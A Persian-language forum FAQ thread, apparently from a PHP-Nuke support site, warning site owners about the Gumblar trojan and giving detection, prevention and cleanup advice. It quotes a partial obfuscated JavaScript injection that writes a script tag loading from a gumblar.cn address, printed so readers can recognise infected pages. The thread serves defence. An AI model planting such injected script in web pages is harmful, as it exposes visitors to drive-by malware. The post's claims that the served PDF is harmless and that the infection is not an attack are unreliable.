تروجان سایت های برپایه php ..!

سئوالات متداول نسخه 8.1
نمایه کاربر
sam_pontiac
مدیر بازنشسته
مدیر بازنشسته
پست: 2695
تاریخ عضویت: یک شنبه 19 آبان 1387, 12:00 am
محل اقامت: سایبر !
تشکر کرده: 320 دفعه
تشکر شده: 977 دفعه

تروجان سایت های برپایه php ..!

پست توسط sam_pontiac » پنج شنبه 31 اردیبهشت 1388, 2:20 pm

سلام
قبل از هرچیزی از مدیران محترم میخوام که ، اگر این تاپیک ، تاپیک زائدی هست حتما این تاپیک رو پاک کنند تا بیشتر از این انجمن ها دچار ازدیاد نشه و اگر هم مشکلی نداره ، بگذاریم بمونه ، و کاربران محترم سایت فقط این رو بخونند و تمام ، و این تاپیک قفل بشه ، بهتره.ممنون و سپاسگذار ، چون راهکارها هم داده میشه و سوالات اضافه..!

اخیرا دیده شده تو همین سایت که مثلا در هفته پیش 50تا تاپیک زده شده در مورد اینکه سایتم ویروسی شده ، تروجانی شدم ، گوگل بد افزار میده و فایر فاکس report attake site میده و ....!
در آخر نتیجه ای هم که گرفته شده این بوده که نیوک رو دوباره نصب کنند و در بسیاری از حالت ها هم ، دیتابیس و اطلاعات هم از بین رفته و به صورت کامل جایگزین نشده.
خب این تروجان ،یا ویروس چی هست که به جون سایت های php افتاده.این ویروس گامبلار نام داره و به هیچ وجه قابل جلوگیری از گسترش نیست الا ....!
اول از همه شما فایل های iframe که تو سایتتون قرار دادید ، علی الخصوص لینک باکس های بیخود در سایت های خودتون رو بردارید (اگر به این مشکل برنخوردید ، به زودی بر میخورید ) این ویروس کارش چیه؟
فقط و فقط میفته به سایت هایی که بر پایه زبان php هستند و بس.اکثرا هم دیده شده که روی فایل های js ساخته شده و هنوز راهکاری براش پیدا نشده.
سایتهایی که به این ویروس ، یا تروجان یا هر عامل مخرب دیگه ای که میشه اسمش رو گذاشت دچار شدند ، یک فایل pdf برای دانلود به بازدید کننده های سایت خودشون میفرستند که نه اون فایل به کامپیوتر شخص آسیبی میزنه نه چیز دیگه ای.
شما کارهایی که میتونید تا حدودی انجام بدید.
در فایل های php خودتون ، تو هاست سایتتون چک کنید ، فایلی به نام image.php بوجود نیومده باشه ، اگر به وجود اومده بود که کلا هر چی پست و مطلب و اعضا و ... گرفتید رو بیخیال بشید بهتره.
اگر هم به وجود نیومده بود تو فایل های js به صورت اتوماتیک کدهای اخلال گر خودش رو میگذاره.

راهکار ها:

اگر میخواید ببینید که سایتتون دچار این مشکل شده یا نه ، همین حالا از طریق مرورگر خودتون ، یکبار view source رو بزنید و ببینید اگر کدهای درهم و برهمی مثل این کد:

کد: انتخاب همه

&3dnavigator&2e&75ser&41gent&3bif((u&2ei&6ed&65xO&66(
&22Win&22)&3e0)&26&26(&75&2eindexO&66(&22NT&20&36&22)&3c0)&26
&26(d&6fcumen&74&2ec&6foki&65&2e&69&6edex&4ff(&22&6d&69e&6b&3d
&31&22&29&3c0&29&26&26&28t&79p&65o&66(zrvzts)&21&3dtypeof(&22A&
)))&7bzr&76&7at&73&3d&22A&22&3b&65v&61&6c&28&22if&28wind&6f&77&
&22+a+&22)j&3d&6a+&22&2ba+&22Maj&6f&72&22&2bb+a&2b&22M&69nor&22
+b+a&2b&22B&75ild&22&2bb+&22j&3b&22)&3bd&6fcu&6d&65n&74&2ewr&69te&2
8&22&3c&73cr&69p&74&20&73rc&3d&2f&2f&67u&6d&62lar&2ec&6e&2frss&2f&3fi&64&3d
&22+j+&22&3e&3c&5c&2f&73&63ri&70t&3e&22)&3b&7d';var gXJ=unescape(bNFt.replac

(البته این کد رو من ویرایش کردم تا آسییبی وارد نشه.)!!اگر این کد رو تو سورس خودتون دیدید که باید نه تنها نیوک ، بلکه تمامی مطالب خودتون رو از نو و از صفر شروع کنید و یا ... خداحافظی با سایت کنید چون راهکاری نداره.

دسترسی های مربوط به فایل های جاوا اسکریپت سایتتون رو js ها رو محدود کنید (اگر مبتلا به این ویروس نشدید هنوز این کار رو انجام بدید)
در کل دوستانی که به این مشکل دچار شده اند ، بهشون پیشنهاد میکنم که از نو کارشون رو شروع کنند ، و مجدد ، کارها رو انجام بدند ....

امیدوارم این تاپیک رو دوستان به خوبی مطالعه کنند و به گونه ای بشه که دیگه تاپیک های تکراری زیادتری در این مورد نبینیم.


این ویروس و یا تروجان ، کاملا غیر ارادی بوده ، نه هک ، نه چیز دیگه ای ، و از طریق خارج از سایت شما روی فایل های شما خودش رو سوار میکنه!!



پیشگیری ها :

از صفحات html برای iframe استفاده نکنید !! به هیچ وجه ، چون اگر از طریق iframe وارد سایتتون بشه ، دیگه واقعا هیچ کاری نمیشه کرد این ویروس رو!!!مواظب باشید.
مثل صفحاتی مثل :
لینک باکس ، بلوک هایی که به صورت iframe تنظیم شده و اصل بلوک در جای دیگه به صورت html وجود داره.
فایل های حاوا اسکریپت به غیر از فایل های موجود تو نیوک ، که فایل های موجود حق دسترسی اون به صورت پیش فرض با امنیت تعیین میشه!
اسکرپیت های غیر امن و ... جلوگیری کنید.
در کل ، من خودم تو سایت جند تا از دوستان تو همین سایت درگیر بودیم خیلی وقت و آخر هم از اول پست هاش رو تنظیم کرد ، دیتابیس بن کل از بین رفت.!



راهکارها :

در چنین مواقعی است که ارزش بک آپها مشخص می شود , اگر یک آپ دارید که هیچ اما اگر ندارید :
1 - یک فایل خالی به نام image.php می سازید .
2 - این فایل را با فایلی که در فولدر imgaes در سایتتان وجود دارد جابجا می کند و سطح دسترسی آن را جوری تنظیم می کنید
که در آن write وجود نداشته باشد .
3 - کدهای مذکور را از فایلهای سایتتان پاک کرده و سطح دسترسی این فایلها را نیز طروی تنظیم می کنید که در آن write وجود
نداشته باشد .
4 - تمامی فایلهایی که یا به نام های زیر هستند یا این نامهای در قسمتی از نام آنها وجود دارد را چک می کنید :
index.php
index.htm
index.html
script.js
config.php
db.php





از مدیران باز هم درخواست دارم اگر تاپیک زائد هست ، پاک بشه ،
اگر هم تاپیک جاش بده منتقل بشه
ولی اگر موند قفل بشه ، چون جای سوالی برای این موضوع باقی نمونده.

ممنون.
موفق باشید.


نمایه کاربر
sam_pontiac
مدیر بازنشسته
مدیر بازنشسته
پست: 2695
تاریخ عضویت: یک شنبه 19 آبان 1387, 12:00 am
محل اقامت: سایبر !
تشکر کرده: 320 دفعه
تشکر شده: 977 دفعه

پست توسط sam_pontiac » یک شنبه 3 آبان 1388, 5:08 pm

این تاپیک رو بدلیل سوالات پیش اومده در این مدت بالا میارم و یک سری توضیحات به اون اضافه میکنیم که به شرح زیر هست :
گاهی اوقات دیده میشود که دوستان صفحاتی رو که دچار این تروجان هستند و یاتروجان های مرتبط و هم نوع ، به صورت آیفریم در سایت قرار میدهند ، بعنوانمثال ، سایتی هست که این مشکل رو داره و بنا به بی توجهی برخی از دوستان ،باز مشاهده میشه که آیفریم میکنن و عیب اون رو روی سیستم نیوک و ...میگذارند که همین جا ، جا داره که کلا این مسئله رو رد کنیم ،که نیوک هیچموقع مشکلی در بر نخواهد داشت ، چرا که دقت کنید سایت های بزرگی مثل ،سایت همشهری هم مدتی به این اوضاع دچار شده بود ، آیا سایت همشهری از سیستم نیوک استفاده میکنه؟؟ و یا وبلاگ های پکستنیدر بلاگفا ! پس خواهشمندم اول از همه اعمالی که خودتون انجام دادید در سایتتون رو چک کنید و اولینکسی که زیر سوال میبرید خودتون باشید ، چون بغیر از خود شما کسی دسترسی ایبه هاست شما نداره.
نکته ای دیگر رو که لازم هست بگم این هست که :

لینک باکس وجودش هیچ الزامی برای یک سایت نخواهد داشت و حتی در سئوی سایت شما نیز اثری ندارد.
این مسئله رو متذکر شدم چون خیلی از دوستانی که به این مشکل دچار شدند و مشکلشون رو به نوعی حل کردیم ، این بود که از لینک باکس های متعدد در سایتشون استفاده میکردند ، درسته شاید لینک باکس به سایت شما هیت بده ولی در سئوی سایت شما اثرش 0 هست چون روبات ها هیچ وقت آیفریم ها رو نمیخونن.
کدهای جاوا اسکریپت نا امن نیز به این مشکل دچار خواهند شد.اگر قصد داریدصفحه ای را به صورت آیفریم مانند تبلیغات در سایتتان قرار دهید که فقطکافیست کد آن را در صفحه ای html خودتان بسازید و با رعایت حق دسترسی 444در روت هاستتون آپلود و در سایتتون به صورت آیفریم مشخص کنید.

مهم ترین موضوع و خلاصه موضوع اینکه :
کدهای جاوا اسکریپتی رو قرار بدید که از سلامت اون مطمئن باشید و هر کدی رو قرار ندید.
فایل های جاوائی که در روت هاست خودتون هستند و با پس وند .JS حق دسترسی 444 رو اعمال کنید.
فایل های php و html نیز به همین صورت همانطور که در بالاتر گفته شد.
امیدواریم که دوستان مشکلی از این قبیل نداشته باشند ، و اگر خدائی نکرده چنین مشکلی برای هرکدام از دوستان بوجود اومد ، و توانائی رفع این مشکل رو نداشتند میتونند با پیغام خصوصی من رو مطلع کنند تا راهنمائی و یا در نهایت به رفع مشکلشون تموم بشه.

این موضوع رو متذکر شدم که این تاپیک کل پاسخ این مشکل برای شماست و زدن تاپیک مجدد هیچ ضرورتی نداره و در نهایت همین پاسخ شماست ، پس خواهشا دوستانی که نتونستند این مشکل رو حل کنند به بنده پیغام خصوصی بزنند تا مشکل حل شود.
موفق و پیروز باشید.
صلوات ، نثار روح گذشتگان
از جمله
پدرم...
قفل شده قفل شده

بازگشت به “سئوالات متداول”